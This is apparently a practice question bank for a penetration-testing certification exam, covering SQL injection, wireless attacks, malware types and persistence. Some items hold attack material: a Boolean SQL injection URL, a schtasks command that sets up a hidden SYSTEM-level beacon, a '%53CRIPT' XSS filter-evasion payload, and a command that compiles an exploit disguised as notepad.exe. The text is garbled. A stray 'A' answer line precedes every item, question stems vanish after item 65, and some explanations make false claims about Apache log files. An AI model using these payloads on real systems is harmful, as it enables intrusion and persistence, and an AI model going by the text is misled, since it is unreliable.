OBJ-5.1: On Apache web servers, the logs are stored in a file named access_log. By default, the file can be located at /var/log/httpd/access_log. This file records all requests processed by the Apache server. The WebSphere Application Server uses the httpd_log file for z/OS, which is a very outdated server from the early 2000s. The http_log file is actually a header class file in C used by the Apache web server’s pre-compiled code that provides the logging library but does not contain any actual logs itself. The file called apache_log is actually an executable program that parses Apache log files within in Postgres database.

Question 44

Q

While conducting a penetration test of a web application, you enter the following URL, http://test.diontraining.com/index.php?id=1%20OR%2017-7%3d10. What type of exploit are you attempting?

A. Session hijacking

B. SQL injection

C. Buffer overflow

D. XML injection

Answer

A

B. SQL injection
Explanation
OBJ-5.3: This is an example of a Boolean-based SQL injection. This occurs when data input by a user is interpreted as a SQL command rather than as normal data by the backend database. In this example, notice that the statement being parsed as part of the URL after the equal sign is equivalent to 1 or 17-7=10. This means the portion of the statement that is 17-7=10 would return a value of 1 (since it is true). Then, we are left to compute if 1 = 1, and since it does, the SQL database will treat this as a positive authentication. This is simply an obfuscation technique of a 1=1 SQL injection technique. A buffer overflow is an exploit that attempts to write data to a buffer and exceed that buffer’s boundary to overwrite an adjacent memory location. A session hijacking attack consists of exploiting the web session control mechanism, normally managed for a session token. XML Injection is an attack technique used to manipulate or compromise an XML application or service’s logic.

Question 45

Q

Praveen is currently investigating activity from an attacker who compromised a host on the network. The individual appears to have used credentials belonging to a janitor. After breaching the system, the attacker entered some unrecognized commands with very long text strings and then began using the sudo command to carry out actions. What type of attack has just taken place?

A. Privilege escalation

B. Phishing

C. Social engineering

D. Session hijacking

Answer

A

A. Privilege escalation
Explanation
OBJ-5.2: The use of long query strings points to a buffer overflow attack, and the sudo command confirms the elevated privileges after the attack. This indicates a privilege escalation has occurred. While the other three options may have been used as an initial access vector, they cannot be confirmed based on the question’s details. Only a privilege escalation is currently verified within the scenario due to the use of sudo.

Question 46

Q

Riaan’s company runs critical web applications. During a vulnerability scan, Riaan found a serious SQL injection vulnerability in one of their web applications. The system cannot be taken offline to remediate the vulnerability. Which of the following compensating controls should Riaan recommend using until the system can be remediated?

A. IPS

B. WAF

C. Vulnerability scanning

D. Encryption

Answer

A

B. WAF
Explanation
OBJ-5.3: WAF (web application firewall) is the best option since it can serve as a compensating control and protect against web application vulnerabilities like an SQL injection until the application can be fully remediated. Vulnerability scanning could only be used to detect the issue. Therefore, it is a detective control, not a compensating control. Encryption would not be effective in stopping an SQL injection. An IPS is designed to protected network devices based on ports, protocols, and signatures. It would not be effective against an SQL injection and is not considered a compensating control for this vulnerability.

Question 47

Q

Lamont is in the process of debugging a software program. As he examines the code, he discovers that it is miswritten. Due to the error, the code does not validate a variable’s size before allowing the information to be written into memory. Based on Lamont’s discovery, what type of attack might occur?

A. SQL injection

B. Cross-site scripting

C. Malicious logic

D. Buffer overflow

Answer

A

D. Buffer overflow
Explanation
OBJ-5.2: A buffer overflow occurs when a program or process tries to store more data in a buffer (temporary data storage area) than it was intended to hold. Since buffers are created to contain a finite amount of data, the extra information can cause an overflow into adjacent buffers, corrupting or overwriting the valid data held in them. Although it may occur accidentally through programming error, buffer overflow is an increasingly common security attack on data integrity. In buffer overflow attacks, the extra data may contain codes designed to trigger specific actions, in effect sending new instructions to the attacked computer that could, for example, damage the user’s files, change data, or disclose confidential information. Programs should use the variable size validation before writing the data to memory to ensure that the variable can fit into the buffer to prevent this type of attack.

Question 48

Q

You are conducting a penetration test against an organization. You created an evil twin of their wireless network. Many of the organization’s laptops are now connected to your evil twin access point. You want to capture all of the victim’s web browsing traffic in an unencrypted format during your attack. Which of the following exploits should you utilize to meet this goal?

A. Perform a deauthentication attack

B. Perform an SSL downgrade attack

C. Perform a man-in-the-middle attack

D. Perform an SSL stripping attack

Answer

A

D. Perform an SSL stripping attack
Explanation
OBJ-6.1: An SSL stripping attack, also known as an HTTP downgrade attack, forces the client to communicate with the webserver in plain text (unencrypted) over HTTP instead of HTTPS. Both SSL downgrade and SSL stripping attacks are used to force the victim into using a weaker encryption mechanism (SSL downgrade to SSL-based HTTPS) or no encryption (SSL stripping to HTTP) for its web traffic.

Question 49

Q

You have been contracted to conduct a wireless penetration test for a corporate client. Which of the following should be documented and agreed upon in the scoping documents before you begin your assessment?

A. The make and model of the wireless access points used by the client

B. The number of wireless access points and devices used by the client

C. The frequencies of the wireless access points and devices used by the client

D. The network diagrams with the SSIDs of the wireless access points used by the client

Answer

A

C. The frequencies of the wireless access points and devices used by the client
Explanation
OBJ-6.1: To ensure you are not accidentally targeting another organization’s wireless infrastructure during your penetration test, you should have the frequencies of the wireless access points and devices used by the client documented in the scoping documents. This would include whether your clients use Wireless A, B, G, N, or AC and if they are using the 2.4 GHz or 5.0 GHz spectrum if they are using Wireless N or AC.

Question 50

Q

You are installing a new wireless network in your office building and want to ensure it is secure. Which of the following configurations would create the MOST secure wireless network?

A. WPA2 and AES

B. WPA and MAC filtering

C. WEP and TKIP

D. WPA2 and RC4

Answer

A

A. WPA2 and AES
Explanation
OBJ-6.1: The most secure wireless network configuration utilizes WPA2 with AES encryption. WPA2 is the most secure wireless encryption standard, as it has replaced both WPA and WEP. AES is a robust encryption algorithm that is used by default in the WPA2 standard.

Question 51

Q

Your smartphone begins to receive unsolicited messages while eating lunch at the restaurant across the street from your office. What might cause this to occur?

A. Packet sniffing

B. Bluesnarfing

C. Bluejacking

D. Geotagging

Answer

A

C. Bluejacking
Explanation
OBJ-6.1: Bluejacking sends unsolicited messages over Bluetooth to Bluetooth-enabled devices such as smartphones and tablets. On the other hand, Bluesnarfing involves taking data from a smartphone or tablet over Bluetooth without permission. Bluetooth has a limited range, so the attacker is likely within 10 meters of the victimized device. Geotagging involves embedded the geolocation coordinates into a piece of data (normally a photo or video). Packet sniffing is a passive method of collecting network traffic for follow-on analysis at a later time.

Question 52

Q

During a recent penetration test, it was discovered that your company’s wireless network could be reached from the parking lot. The Chief Security Officer has submitted a change request to your network engineering team to solve this issue because he wants to ensure that the wireless network is only accessible from within the building. Based on these requirements, which of the following settings should be changed to ensure the wireless signal doesn’t extend beyond your building’s interior while maintaining a high level of availability to your users?

A. Power level

B. Channel

C. Frequency

D. Encryption

Answer

A

A. Power level
Explanation
OBJ-6.1: The power level should be reduced for the radio transmitter in the wireless access points. With a reduced power level, the signal will not travel as far, which can ensure the signal remains within the building’s interior only. The other options, if changed, would affect the availability of the network to the currently configured users and their devices.

Question 53

Q

You are conducting a physical penetration test against an organization. You followed an employee to the coffee shop next door, and while they were ordering, you got within 1 foot of them to electronically capture their proximity badge. Which of the following exploits are you planning to use?

A. Session hijacking

B. Bluesnarfing

C. RFID cloning

D. Credential harvesting

Answer

A

C. RFID cloning
Explanation
OBJ-6.1: Radio-frequency identification (RFID) is a standard for identifying and keeping track of an object’s physical location through the use of radio waves. RFID cloning is the act of copying authentication data from an RFID badge’s microchip to another badge. In an attack scenario, badge cloning is useful because it enables the attacker to obtain authorization credentials without actually stealing a physical badge from the organization. Badge cloning can be done through handheld RFID writers, which are inexpensive and easy to use. You simply hold the badge up to the RFID writer device, press a button to copy its tag’s data, then hold a blank badge up to the device and write the copied data. RFID cloning tools can read the data like any normal RFID reader would and be located up to several feet away or inside a bag.

Question 54

Q

Which attack utilizes a wireless access point made to look as if it belongs to the network to eavesdrop on the wireless traffic?

A. Evil twin

B. Rogue access point

C. WEP attack

D. Wardriving

Answer

A

A. Evil twin
Explanation
OBJ-6.1: An evil twin is meant to mimic a legitimate hotspot provided by a nearby business, such as a coffee shop that provides free Wi-Fi access to its patrons. The evil twin is the wireless LAN equivalent of the phishing scam. This type of attack may be used to steal the passwords of unsuspecting users by monitoring their connections or phishing, which involves setting up a fraudulent web site and luring people there.

Question 55

Q

You are conducting a wireless penetration test against an organization. During your attack, you created an evil twin of their wireless network. Many of the organization’s laptops are now connected to your evil twin access point. Which of the following exploits should you utilize next to gather credentials from the victims browsing the internet through your access point?

A. Fragmentation attack

B. Deauthentication attack

C. Karma attack

D. Downgrade attack

Answer

A

D. Downgrade attack
Explanation
OBJ-6.1: A downgrade attack forces a client to use a weaker SSL version that the attacker can crack. Since the devices are connected through your access point, you can establish a weaker SSL-based HTTPS connection between their web browser and the actual web server they wanted. This forcing of the client to use a weaker version is known as a downgrade attack, and it allows the attacker to capture the packets and later crack them offline since SSL-based HTTPS is weak enough to crack due to vulnerabilities in its design.

Question 56

Q

Which of the following is the biggest weakness with ICS and SCADA systems in a network?

A. Cybersecurity experts don’t know how to secure ICS/SCADA

B. These systems are difficult to retofit with modern security

C. ICS/SCADA must be connected to the internet to function

D. They are patched using standard vendor OS patches

Answer

A

B. These systems are difficult to retofit with modern security
Explanation
OBJ-7.2: Industrial control system (ICS) and supervisory control and data acquisition (SCADA) systems were developed many years before security standards were established and integrated into their design. Many of these older systems date back to the 1970s and are still in use today. Over time, these systems were incorporated into the organization’s TCP/IP data networks, which provides a huge exploitation area by penetration testers and attackers alike. Many ICS and SCADA vendors are slow to implement security measures since they cannot be easily retrofitted with the newer security required. Therefore, ICS and SCADA systems should ALWAYS be isolated from production networks and segmented into their own logical network. For example, some ICS/SCADA systems use a proprietary operating system. More modern ICS/SCADA operates using a version of Windows. However, many still use Windows XP, making them much more vulnerable since they cannot be upgraded to Windows 10 without hardware replacement.

Question 57

Q

Sarah is conducting a penetration test against Dion Training’s Windows-based network. This engagement aims to simulate an advanced persistent threat and demonstrate persistence for 30 days without their system administrators identifying the intrusion. Which of the following commands should Sarah use to run a script that beacons back to her computer every 20 minutes?

A. schtasks /create /tn beacon /tr C:\temp\beacon.bat /sc MINUTE /mo 20 /ru SYSTEM

B. (crontab -l ; echo “*/20 * * * * /tmp/beacon”)| crontab -

C. schtasks /create /tn beacon /tr /tmp/beacon /sc MINUTE /mo 20 /ru SYSTEM

D. (crontab -l ; echo “* */20 * * * /tmp/beacon”)| crontab -

Answer

A

A. schtasks /create /tn beacon /tr C:\temp\beacon.bat /sc MINUTE /mo 20 /ru SYSTEM
Explanation
OBJ-3.2: A scheduled task or scheduled job is an instance of execution, like initiating a process or running of a script, that the system performs on a set schedule. Once the task executes, it can prompt the user for interaction or run silently in the background; it all depends on what the task is set up to do. Scheduled tasks in Windows use the schtasks command. The correct answer for this persistence is to enter the command “schtasks /create /tn beacon /tr C:\temp\beacon.bat /sc MINUTE /mo 20 /ru SYSTEM” that will create a task called “beacon” that runs the script at “C:\temp\beacon.bat every 20 minutes as the SYSTEM level user. The other variant of schtasks is incorrect because it used a Linux-based file directory structure to reference the script location and would fail to run in Windows. The crontab options are used in Linux, not in Windows.

Question 58

Q

A user has reported that their workstation is running very slowly. A technician begins to investigate the issue and notices a lot of unknown processes running in the background. The technician determines that the user has recently downloaded a new application from the internet and may have become infected with malware. Which of the following types of infections does the workstation MOST likely have?

A. Rootkit

B. Keylogger

C. Trojan

D. Ransomware

Answer

A

C. Trojan
Explanation
OBJ-3.3: A trojan is a type of malware that looks legitimate but can take control of your computer. A Trojan is designed to damage, disrupt, steal, or in general, inflict some other harmful action on your data or network. The most common form of a trojan is a Remote Access Trojan (RAT), which allows an attacker to control a workstation or steal information remotely. To operate, a trojan will create numerous processes that run in the background of the system.

Question 59

Q

Dion Training has applied a new Group Policy to all student accounts that will lock out any account in which the student enters their password incorrectly 3 times in a row. Once the account is locked out, the student must wait 15 minutes before they can attempt to log in again. What type of attack is this mitigation strategy trying to prevent?

A. Privilege escalation

B. Brute force attack

C. Spoofing

D. Man-in-the-Middle

Answer

A

B. Brute force attack
Explanation
OBJ-3.2: Since the policy will lockout the student for 15 minutes between attempts, it is a valid mitigation technique against a brute force attack. By extending the waiting period, the attacker’s brute force attempts are less effective.

Question 60

Q

Your network security manager wants a monthly report of the security posture of all the assets on the network (e.g., workstations, servers, routers, switches, firewalls). The report should include any feature of a system or appliance that is missing a security patch, OS update, or other essential security feature and its risk severity. Which solution would work best to find this data?

A. Security policy

B. Penetration test

C. Virus scan

D. Vulnerability scanner

Answer

A

D. Vulnerability scanner
Explanation
OBJ-3.1: A vulnerability scanner is a computer program designed to assess computers, computer systems, networks, or applications for weaknesses. Most vulnerability scanners also create an itemized report of their findings after the scan.

Question 61

Q

Jennifer decided that the licensing cost for a piece of video editing software was too expensive. Instead, she decided to download a keygen program to generate her own license key and install a pirated version of the editing software. After she runs the keygen, a license key is created, but her system performance becomes very sluggish, and her antimalware suite begins to display numerous alerts. Which type of malware might her computer be infected with?

A. Worm

B. Trojan

C. Adware

D. Logic bomb

Answer

A

B. Trojan
Explanation
OBJ-3.3: A trojan is a program in which malicious or harmful code is contained inside an apparently harmless program. In this example, the harmless program is the key generator (which does create a license key). It also has malicious code inside it (causing the additional alerts from the antimalware solution). Likely, this keygen has an embedded virus or remote access trojan (RAT) in its programming.

Question 62

Q

Which of the following open source tools a penetration tester to conduct vulnerability scans against a company’s infrastructure?

A. Peach

B. Wireshark

C. OpenVAS

D. CeWL

Answer

A

C. OpenVAS
Explanation
OBJ-3.1: OpenVAS (Open Vulnerability Assessment System) is an open-source software framework for vulnerability scanning and management that can scan for vulnerabilities, misconfigurations, default passwords, and susceptibility to denial of service (DoS) attacks. Wireshark is an open-source network protocol analyzer used to sniff many traffic types, re-create entire TCP sessions, and capture copies of files transmitted on the network. Peach is a dynamic application security testing tool used to conduct fuzzing. CeWL is a Ruby app that crawls websites to generate word lists that can be used with password crackers such as John the Ripper.

Question 63

Q

A cybersecurity analyst is applying for a new job with a penetration testing firm. He received the job application as a secured Adobe PDF file, but unfortunately, the firm locked the file with a password so the potential employee cannot fill in the application. Instead of asking for an unlocked copy of the document, the analyst decides to write a script in Python to attempt to unlock the PDF file by using passwords from a list of commonly used passwords until he can find the correct password or attempts every password in his list. Based on this description, what kind of cryptographic attack did the analyst perform?

A. Man-in-the-middle attack

B. Brute-force attack

C. Dictionary attack

D. Session hijacking

Answer

A

C. Dictionary attack
Explanation
OBJ-3.2: A dictionary attack is a technique for defeating a cipher or authentication mechanism by trying to determine its decryption key or passphrase by trying hundreds or sometimes millions of likely possibilities, such as words in a dictionary. The key to answering this question is that they were using passwords from a list. In cryptography, a brute-force attack consists of an attacker submitting many passwords or passphrases with the hope of eventually guessing correctly. A dictionary attack is a specific form of a brute-force attack that uses a list. A session hijacking attack compromises the session token by stealing or predicting a valid session token to gain unauthorized access to the webserver. A man-in-the-middle attack (MITM), also known as a hijack attack, is an attack where the attacker secretly relays and possibly alters the communications between two parties who believe that they are directly communicating with each other.

Question 64

Q

What kind of security vulnerability would a newly discovered flaw in a software application be considered?

A. Input validation flaw

B. HTTP header injection vulnerability

C. Zero-day vulnerability

D. Time-to-check to time-to-use flaw

Answer

A

C. Zero-day vulnerability
Explanation
OBJ-3.3: A zero-day vulnerability refers to a hole in software unknown to the vendor and newly discovered. This security hole can become exploited by hackers before the vendor becomes aware of it and can fix it. An input validation attack is any malicious action against a computer system that involves manually entering strange information into a normal user input field that is successful due to an input validation flaw. HTTP header injection vulnerabilities occur when user input is insecurely included within server response headers. The time of check to time of use is a class of software bug caused by changes in a system between checking a condition (such as a security credential) and using the check’s results and the difference in time passed. This is an example of a race condition.

Answer 65

A

D. Analyzing the response received from the service when probed
Explanation
OBJ-3.1: When a vulnerability scanner analyzes the response received from services during a scan or probe, it can determine if the vulnerability exists on the given service on a particular host. Port Scanning is the name for the technique used to identify open ports and services available on a network host. Fuzzing or fuzz testing is an automated software testing technique that involves providing invalid, unexpected, or random data as inputs to a computer program. Banner grabbing is a technique used to gain information about a computer system on a network and the services running on its open ports.

Answer 66

A

A. Zero-day
Explanation
OBJ-3.3: A zero-day attack happens once that flaw, or software/hardware vulnerability, is exploited, and attackers release malware before a developer has an opportunity to create a patch to fix the vulnerability, hence the term zero-day.

Answer 67

A

B. Credentialed scan
Explanation
OBJ-3.1: Credentialed scans log into a system and retrieve their configuration information. Therefore, it should provide you with the best results. Non-credentialed scans rely on external resources for configuration settings that can be altered or incorrect. The scanner’s network location does not directly impact the ability to read the configuration information, so it would not make a difference if you conducted an external or internal scan.

Answer 68

A

D. The crossover error rate is tuned towards false positives
Explanation
OBJ-3.2: A biometric lock is difficult to bypass unless the installer incorrectly configures it. If the biometric lock has a high false acceptance rate, it will allow unauthorized people to open the door. The crossover error rate (CER) is the point where the false acceptance and false rejection rates are equal. When charted on a graph, this point can lean more towards accepting false positives or rejecting true positives. If it leans more towards accepting false positives, the sensitivity has decreased to allow less frustration for its users.

Answer 69

A

D. for /L %X in (1 1 254) do PING -n 1 172.16.0.%X | FIND /I “Reply”
Explanation
OBJ-3.2: The Windows command line does support some fundamental scripting, as shown in this answer. Use an iterative variable to set the starting value (start#) and then step through a set range of values until the value exceeds the set ending value (end#). /L will execute the iterative by comparing start# with end#. If start# is less than end#, the command will execute. When the iterative variable exceeds end#, the command shell exits the loop. You can also use a negative step# to step through a range in decreasing values. For example, (1,1,5) generates the sequence 1 2 3 4 5 and (5,-1,1) generates the sequence (5 4 3 2 1). The syntax is: “for /L %variable in (start# step# end#) do command [CommandLineOptions].”

Answer 70

A

B. The attachment is using a double file extension to mask its identity
Explanation
OBJ-3.3: The message contains a file attachment hoping that the user will execute or open it. The attachment’s nature might be disguised by formatting tricks such as using a double file extension, such as Invoice1043.pdf.exe, where the user only sees the first extension since .exe is a known file type in Windows. This would explain the black popup window that appears and then disappeared, especially if the exe file was running a command-line tool. This file is most likely not a PDF, so there is no need for a PDF reader. Additionally, most modern web browsers, such as Chrome and Edge, can open PDF files by default for the user. The file would not contain an embedded link since an embedded link is another popular attack vector that embeds a link to a malicious site within the email body, not within the file. This email is likely not spam and would be better categorized as a phishing attempt instead.

Answer 71

A

C. Cognitive password attack
Explanation
OBJ-3.2: A cognitive password is a form of knowledge-based authentication that requires a user to answer a question, presumably something they intrinsically know, to verify their identity. If you post a lot of personal information about yourself online, this password type can easily be bypassed. For example, during the 2008 elections, Vice Presidential candidate Sarah Palin’s email account was hacked because a high schooler used the “reset my password” feature on Yahoo’s email service to reset her password using the information that was publically available about Sarah Palin (like her birthday, high school, and other such information).

Answer 72

A

A. IPSec
Explanation
OBJ-3.1: IPSec is the most secure protocol that works with VPNs. The use of PPTP and SSL is discouraged for VPN security. Due to this, PPTP and SSL for a VPN will likely alert during a vulnerability scan as an issue to be remediated.

Answer 73

A

A. g++ exploit.cpp -o notepad.exe
Explanation
OBJ-3.2: g++ is free C++ compiler that is available across a wide variety of operating systems, and is installed by default as part of Kali Linux. The proper syntax to compile a C++ file (*.cpp) is “g++ filename -o outputfile”, so “g++ exploit.cpp -0 notepad.exe” is correct.

Answer 74

A

A. An uncredentialed scan of the network was performed
Explanation
OBJ-3.1: Uncredentialed scans are generally unable to detect many vulnerabilities on a device. When conducting an internal assessment, you should perform an authenticated (credentialed) scan of the environment to most accurately determine the network’s vulnerability posture. In most enterprise networks, if a vulnerability exists on one machine, it also exists on most other workstations since they use a common baseline or image. If the scanner failed to connect to the workstations, an error would have been generated in the report.

Answer 75

A

B. C++
Explanation
OBJ-3.2: Many memory manipulation functions in C and C++ do not perform bounds checking and can easily overwrite the allocated bounds of the buffers they operate upon. Newer languages like Python, Java, and Swift do a better job of protecting against a buffer overflow, but even they are not perfect.

Answer 76

A

B. Worm
Explanation
OBJ-3.3: A worm is a self-replicating type of malware that does not require user intervention or another application to act as a host for it to replicate. Viruses and Macros require user intervention to spread, and Trojans are hosted within another application that appears harmless.

Answer 77

A

B. Virtual hosts
Explanation
OBJ-3.1: Vulnerability reports should include both the physical hosts and the virtual hosts on the target network. A common mistake of new cybersecurity analysts is to include physical hosts, thereby missing many network assets.

Answer 78

A

B. Sticky MAC
Explanation
OBJ-4.1: Persistent MAC learning, also known as Sticky MAC, is a port security feature that enables an interface to retain dynamically learned MAC addresses when the switch is restarted or if the interface goes down and is brought back online. This is a security feature that can be used to prevent someone from unplugging their office computer and connecting their own laptop to the network jack without permission since the switch port connected to that network jack would only allow the computer with the original MAC address to gain connectivity using Sticky MAC.

Answer 79

A

B. MAC Flood
Explanation
OBJ-4.1: MAC flooding is a technique employed to compromise the security of switched network devices. The attack forcing legitimate MAC addresses out of the table of contents in the switch and forcing a unicast flooding behavior, potentially sending sensitive information to portions of the network where it is not normally intended to go. Essentially, since the switch table of contents is flooding with bad information, the switch could fail open and begin to act like a hub, broadcasting all the frames out of every port. This would allow the attacker to sniff all network packets since he is connected to one of those switch ports. A fraggle attack is a denial-of-service (DoS) attack that involves sending a large amount of spoofed UDP traffic to a router’s broadcast address within a network. A teardrop attack is a denial-of-service (DoS) attack that involves sending fragmented TCP packets to a target machine. The Smurf attack is a distributed denial-of-service attack. Large numbers of Internet Control Message Protocol (ICMP) packets with the intended victim’s spoofed source IP are broadcast to a computer network using an IP broadcast address.

Answer 80

A

B. IPS
Explanation
OBJ-4.5: Intrusion Protection Systems (IPS) can reconfigure themselves based on the threats experienced. Firewalls maintain a static configuration.

Answer 81

A

D. <%53CRIPT>
Explanation
OBJ-4.5: Since cross-site scripting (XSS) relies on < script> and < /script> HTML tags to launch, the system administrators had a good idea of creating input validation using a REGEX for those keywords. Unfortunately, they forgot to include a more inclusive version of this REGEX to catch all variants. For example, simply using [Ss][Cc][Rr][Ii][Pp][Tt] would have been much more secure, but even this would miss %53CRIPT would evade this filter. To catch all the letter S variants, you would need to use [%53%%73Ss], which includes the capital S in hex code, the lower case s in hex code, the capital S, and the lowercase s. As a penetration tester, it is important to remember that you can evade weak input validation using ASCII encoded characters, like %53 for the S character. As a cybersecurity analyst, you must build good input validations into your systems to prevent these types of attacks.

Answer 82

A

D. Responder
Explanation
OBJ-4.4: Responder provides a fake server and relay tool that is included with Kali Linux. It responds to LLMNR, NBT-NS (NETBIOS), POP, IMAP, SMTP, and SQL queries to recover sensitive information such as user names and passwords. Responder is configured to listen for LLMNR/NBNS queries and respond with itself as the desired destination. When the client then tries to connect, it prompts the user to log on based on the client’s protocol, thus harvesting the user’s credentials.

Answer 83

A

C. Spear phishing
Explanation
OBJ-4.2: Spear phishing is the fraudulent practice of sending emails from a seemingly known or trusted sender to induce targeted individuals to reveal confidential information. The key to answering this question is that the attack was focused on a targeted set of people, not just an indiscriminate large group of random people.

Answer 84

A

C. Phishing
Explanation
OBJ-4.2: This is an example of a phishing campaign. Phishing refers to obtaining user authentication or financial information through a fraudulent request for information. Phishing is specifically associated with emailing users with a link to a faked site (or some other malware that steals the information they use to try to authenticate). Spear phishing is an email or electronic communications scam targeted towards a specific individual, organization, or business. In this example, the specific user wasn’t clearly targeted by their name or by their association with a particular store, company, or website.

Answer 85

A

A. Insider Threat
Explanation
OBJ-4.2: An insider threat is any current or former employee, contractor, or business partner who has or had authorized access to an organization’s network, system, or data and intentionally exceeded or misused that access in a manner that negatively affected the confidentiality, integrity, or availability of the organization’s information or information systems. Based on the details provided in the question, it appears the employee’s legitimate credentials were used to conduct the breach. This would be classified as an insider threat. A zero-day is a vulnerability in software unpatched by the developer or an attack that exploits such a vulnerability. A known threat is a threat that can be identified using a basic signature or pattern matching. An advanced persistent threat (APT) is an attacker with the ability to obtain, maintain, and diversify access to network systems using exploits and malware.

Answer 86

A

D .Honeypot
Explanation
OBJ-4.5: A honeypot is a computer security mechanism set to detect, deflect, or in some manner counteract attempts at unauthorized use of information systems. Generally, a honeypot consists of data that appears to be a legitimate part of the site but is actually isolated and monitored and seems to contain information or a resource of value to attackers, who are then blocked.

Answer 87

A

A. Add http://www.freephone.io:8080/winner.php to the browser’s group policy block list
Explanation
OBJ-4.2: There are two ways to approach this question. First, you can consider which is the right answer (if you know it). By adding the full URL of the phishing link to the browser’s group policy block list (or black hole list), the specific webpage will be blocked from being accessed by the employees while allowing the rest of the freephone.io domain to be accessible. Now, why not just block the entire domain? Well, maybe the rest of the domain isn’t suspect, but just this one page is. (For example, maybe someone is using a legitimate site like GitHub to host their phishing campaign. Therefore you only want to block their portion of GitHub.) The second approach to answering this question would be to rule out the incorrect answers. If you used DENY TCP to the firewall ACL answer, you would block all access to the domain, blocking legitimate traffic as well as possible malicious activity. If you used the DENY IP ANY ANY to filter traffic at the IPS, you would block any IP traffic to ANY website over port 8080. If you added the link to the load balancer, this would not block it either. Therefore, we are only left with the correct answer of using a group policy in this case.

Answer 88

A

B. Insider threat
Explanation
OBJ-4.2: Mallory is considered an insider threat in this scenario. An insider threat is a malicious threat to an organization that comes from people within the organization, such as employees, former employees, contractors or business associates, who have inside information concerning the organization’s security practices, data, and computer systems. Regardless of her method of stealing the information, the key to this question resides in the fact that she is an employee of the company doing something malicious.

Answer 89

A

C. ARP cache poisoning
Explanation
OBJ-4.1: Based on the scenario, we can eliminate evil twin (focused on wireless access points) and IP spoofing (since this affects layer 3 traffic). While MAC spoofing the gateway’s address might work, it would also affect every computer on this subnet. By conducting an ARP cache poisoning attack, Rick can poison the cache and replace Mary’s computer’s MAC association with his own, allowing him to become the man-in-the-middle between Mary and the default gateway.

Answer 90

A

B. Spoofing
Explanation
OBJ-4.1: A man-in-the-middle attack (MITM) is an attack where the attacker secretly relays and possibly alters the communications between two parties who believe they are directly communicating with each other. One example of a MITM attack is active eavesdropping. The attacker makes independent connections with the victims and relays messages between them to make them believe they are talking directly to each other over a private connection. In fact, the entire conversation is controlled by the attacker. The attacker must intercept all relevant messages passing between the two victims and inject new ones. Spoofing is often used to inject the attacker into the conversation path between the two parties.

Answer 91

A

B. Tailgating
Explanation
OBJ-4.2: Based on the description, the ethical hacker conducted a very specialized type of social engineering attack known as tailgating. Sometimes on a certification exam, there are two correct answers, but one is more correct. This question is an example of that concept. Tailgating involves someone who lacks the proper authentication following an employee into a restricted area. Social engineering uses deception to manipulate individuals into divulging confidential or personal information that may be used for fraudulent purposes. Shoulder surfing is a type of social engineering technique used to obtain personal identification numbers (PINs), passwords, and other confidential data by looking over the victim’s shoulder.

Answer 92

A

C. Replay attack
Explanation
OBJ-4.1: A replay attack repeats a legitimate transmission in a malicious context. For example, a user might send their authentication information to a client or system; the attacker who eavesdrops on this communication can use the authentication in a later transmission, essentially impersonating the victim. In wireless networking, replaying transmissions can be used to enable several different attacks. Do not confuse a replay attack with a relay attack. In a replay attack, a legitimate network packet or frame is retransmitted repeatedly. In a relay attack, an attacker inserts themselves man-in-the-middle style between two devices, intercepting and forwarding traffic between them.

Answer 93

A

C. DNS poisoning
Explanation
OBJ-4.1: DNS poisoning (also known as DNS cache poisoning or DNS spoofing) is a type of attack which uses security gaps in the Domain Name System (DNS) protocol to redirect internet traffic to malicious websites. MAC spoofing is a technique for changing a factory-assigned Media Access Control (MAC) address of a network interface on a networked device. ARP spoofing is a type of attack in which a malicious actor sends falsified ARP (Address Resolution Protocol) messages over a local area network using layer 2 address information. DNS brute-forcing is used to check for wildcard entries using a dictionary or wordlist. This technique is used when a DNS zone transfer is not allowed by a system.

Answer 94

A

A. An malicious inbound TCP packet
Explanation
OBJ-4.5: The rule header is set to alert only on TCP packets based on this IDS rule’s first line. The flow condition is set as “to_client,established,” which means that only inbound traffic will be analyzed against this rule and only inbound traffic for connections that are already established. Therefore, this rule will alert on an inbound malicious TCP packet only when the packet matches all the conditions listed in this rule. This rule is an example of a Snort IDS rule. For the exam, you do not need to create your own IDS rules, but you should be able to read them and pick out generic content like the type of protocol covered by the signature, the port be analyzed, and the direction of flow.

Answer 95

A

B. HTTP
Explanation
OBJ-4.1: HTTP is an unsecured protocol, and information is passed without encryption. If the user signed into their webmail over HTTP instead of HTTPS, a network sniffer could compromise the username and password. Additionally, if the user was using an email client, then the SMTP connection could have been compromised, but since that wasn’t an option in this question, we must assume Bobby used a webmail client over HTTP instead.

Answer 96

A

D. Static code analysis
Explanation
OBJ-5.1: Buffer overflows are most easily detected by conducting a static code analysis. Manual peer review or pair programming methodologies might have been able to detect the vulnerability. Still, they do not have the same level of success as a static code analysis using proper tools. DevSecOps methodology would also improve the likelihood of detecting such an error but still rely on human-to-human interactions and human understanding of source code to detect the fault. Dynamic code analysis also may have detected this if the test found exactly the right condition. Still, again, a static code analysis tool is designed to find buffer overflows more effectively.

Answer 97

A

B. Cross-site scripting
Explanation
OBJ-5.2: This scenario is a perfect example of the effects of a cross-site scripting (XSS) attack. If your website’s HTML code does not perform input validation to remove scripts that may be entered by a user, then an attacker can create a popup window that collects passwords and uses that information to compromise other accounts further. A cross-site request forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they are currently authenticated. An XSS will allow an attacker to execute arbitrary JavaScript within the victim’s browser (such as creating pop-ups). A CSRF would allow an attack to induce a victim to perform actions they do not intend to perform. A rootkit is a set of software tools that enable an unauthorized user to control a computer system without being detected. SQL injection is the placement of malicious code in SQL statements via web page input. None of the things described in this scenario would indicate a CSRF, rootkit, or SQL injection.

Answer 98

A

C. Setting the secure attribute on the cookie
Explanation
OBJ-5.1: When a cookie has the Secure attribute, the user agent includes the cookie in an HTTP request only if transmitted over a secure channel (typically HTTPS). Although seemingly useful for protecting cookies from active network attackers, the Secure attribute protects only the cookie’s confidentiality. Forcing the web application to use TLS or SSL does not force the cookie to be sent over TLS/SSL, so you still need to set the cookie’s Secure attribute. Hashing the cookie provides the cookie’s integrity, not confidentiality; therefore, it will not solve the issue presented by this question.

Answer 99

A

B. Version disclosure of server information
Explanation
OBJ-5.1: The disclosure of internal server information, such as its version, is a common vulnerability on both static webpages and dynamic webpages. This disclosure can occur during banner grabber or by reviewing the source course of the webpage.

Answer 100

A

B. Data exfiltration
Explanation
OBJ-5.1: If attackers use SQL injection to extract data through a Web application, the requests issued by them will usually have a larger HTML response size than a normal request. For example, if the attacker extracts the full credit card database, then a single response for that attacker might be 20 to 50 MB, where a normal response is only 200 KB. Therefore, this scenario is an example of a data exfiltration indicator of compromise. Based on the scenario, there is no evidence that a user is conducting a privilege escalation or using unauthorized privileges. There is also no evidence of a new account having been created or beaconing occurring over the network.

Answer 101

A

D. XML denial of service issues
Explanation
